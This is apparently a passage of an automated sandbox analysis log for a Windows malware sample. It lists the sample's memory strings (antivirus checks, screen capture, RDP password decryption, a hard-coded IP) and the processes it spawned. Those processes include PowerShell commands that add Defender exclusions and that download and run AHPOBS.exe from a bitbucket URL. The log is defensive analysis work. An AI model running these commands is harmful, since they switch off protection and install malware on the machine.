              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /sounx.vbsmemstr_9ad0256d-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /666xv.jpgmemstr_d34acfda-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tagcursorinfomemstr_4f668618-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gigdiprefmemstr_cf218da1-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antivirusmemstr_132df87a-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winver.exehtmemstr_dafa400a-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: deskwidhmemstr_7c06ef80-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osversionmemstr_180826fb-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disabledmemstr_b2a7e816-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osversionz9tm'memstr_10de04b9-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osversionionw9qm(memstr_f1b5eb91-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: deskheghtp9nm)memstr_a7d906a2-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sfilebufferm9km*memstr_8494b016-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: antivirusf9`m+memstr_d9b197d9-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c9]m,memstr_0cab85f0-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: username16.250\9zm-memstr_a0b99068-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktopwidthy9wm.memstr_6fd98806-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osversionsionr9lm/memstr_1f1d1af1-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 172.232.216.250o9im0memstr_76b9d1b1-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: disabledh9fm1memstr_018cedb2-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktopheightz>\|memstr_425b4192-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ngdfgrt29memstr_0512ed0d-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fvffsmemstr_606b1481-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bbdfdfpmemstr_227f3ff1-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ffazezsmemstr_711ff56d-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: thisavmemstr_e2af4c19-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yyzerfmemstr_9ae64f8b-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \svhostmemstr_33b772cd-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ngdfgrtmemstr_de22b3df-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }:zm?memstr_bc837310-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x:um@memstr_f5c0402a-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rw:pmamemstr_7fb04cc8-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r:smbmemstr_948956ef-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q:nmcmemstr_330c4d41-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pacthwal:imdmemstr_230cb55a-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k:dmememstr_37f125e3-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdirf:gmfmemstr_33504904-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tempdire:bmgmemstr_7253ef65-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `:]mhmemstr_9a50553e-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _:xmimemstr_3a19c21a-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cert8z:[mjmemstr_5890bbcb-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y:vmkmemstr_eb31c3ee-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t:qmlmemstr_c97823e0-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s:lmmmemstr_56d33e46-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dlcliememstr_8096d0f7-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n:omnmemstr_4837437d-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m:jmomemstr_faabe38f-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \foxrh:empmemstr_1347981f-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g:@mqmemstr_7fbcc1fa-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b:cmrmemstr_175864d7-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dirfoxmemstr_6b3af7ad-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: screenmemstr_36bf0b7f-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gerxpmemstr_16e31649-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: screenmemstr_8ba1370f-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oks0rmemstr_f284fe96-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gercx|memstr_65e7634d-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: escupxw;plmemstr_fd7cd0fa-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \es.dllk;dlmemstr_31ec99e2-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |f;glmemstr_32743083-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: recivtmemstr_7eb8a103-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: edit7memstr_df8f191e-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccwa1lmemstr_f07c39fc-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ffazezszmemstr_f7202c05-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \microsoft\windows\themes\transcodedwallpaper.jpgp:tzmemstr_b79198c2-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword size;dword flags;handle hcursor;p:tzmemstr_f7b53617-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __screencaptureconstant_sm_cxscreenpot;\:tvmemstr_55d3e9a4-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: olorh:tbmemstr_3b1643a6-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bool icon;dword xhotspot;dword yhotspot;handle hmask;handle hcolorp:tzmemstr_99203772-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __screencaptureconstant_sm_cyscreenz>\|memstr_7434177c-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vh*nrmemstr_f6b0e723-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: archxmemstr_f2ee2ab9-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tooormemstr_47e9633f-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: useccmemstr_5357b4d5-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osarchmemstr_e535a859-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tooorgmemstr_e4d6f13f-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _getav#memstr_c4ead25b-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: thisav2memstr_9a730198-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: thisav2^memstr_d63cd960-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win_11memstr_654a10f4-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: thisav-memstr_42629db5-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win_10memstr_4efc4cdb-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1666ssmemstr_80fce11c-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win32xmemstr_a7839d52-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vicnamezmemstr_e79836a6-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qlitsmemstr_53f5483a-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vicnamememstr_440ef75c-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adminmemstr_a1b0b49d-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: resxomemstr_79d1a8a2-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dexcz2memstr_30658268-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dexczhmemstr_47a1dd82-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: laptopgmemstr_5ddb3f5e-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktop$memstr_f9cb70ac-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: porsdmemstr_80960326-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h"n}d,memstr_65d8f273-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _filereadtoarraymemstr_675ceb4c-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _filelisttoarraymemstr_b7d8e24b-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupcommondirmemstr_7c672c96-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcpevent_disconnectmemstr_17a351a8-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sw_showminnoactivememstr_8e292c22-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \microsoft\wlansvc_memstr_5a4068b9-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _filelisttoarrayvmemstr_12831786-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uncryptrdppassword,memstr_3509499a-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uncryptrdppasswordmemstr_69c35a3f-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fddsf43memstr_42a9e608-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bkeysmemstr_add61010-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: faze46wmemstr_ceb3251f-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win32xhmemstr_f02d4f2f-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: faze46memstr_b638d0ac-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboui2memstr_d27cb5e2-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mgxcli#memstr_043526f4-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mgxclimemstr_86735724-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mouxcmemstr_db9fdd1e-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: begincvmemstr_1a6e6742-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oedssp.memstr_56025754-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: actqusmemstr_fcaf7dd6-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ddddd-memstr_90ff83a6-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vcersmemstr_abd578f0-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pprprprmemstr_f031b4a4-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: imgclimemstr_b0e1830e-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: betabtamemstr_770c5753-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x3x3x3memstr_2a03bbc4-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x2x2x2memstr_7cee1820-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hosts4memstr_ae0a265d-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ddfdztymemstr_f26883a1-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uuxxxymemstr_19066b67-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: betaimemstr_17c77772-2
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00434418
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,10_2_0043333C
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\AHPOBS.exe C:\Users\user\AppData\Local\Temp\AHPOBS.exe ;Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00446124
              Source: AHPOBS.exe, 0000000A.00000002.3917281213.0000000003FAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: AHPOBS.exeBinary or memory string: Shell_TrayWnd
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Class:Shell_TrayWnd]w
              Source: AHPOBS.exe, 0000000A.00000000.2381208135.0000000000482000.00000002.00000001.01000000.00000005.sdmp, AHPOBS.exe, 0000000A.00000003.2555385541.000000000453C000.00000004.00000020.00020000.00000000.sdmp, AHPOBS.exe, 0000000A.00000003.2555058983.0000000004417000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
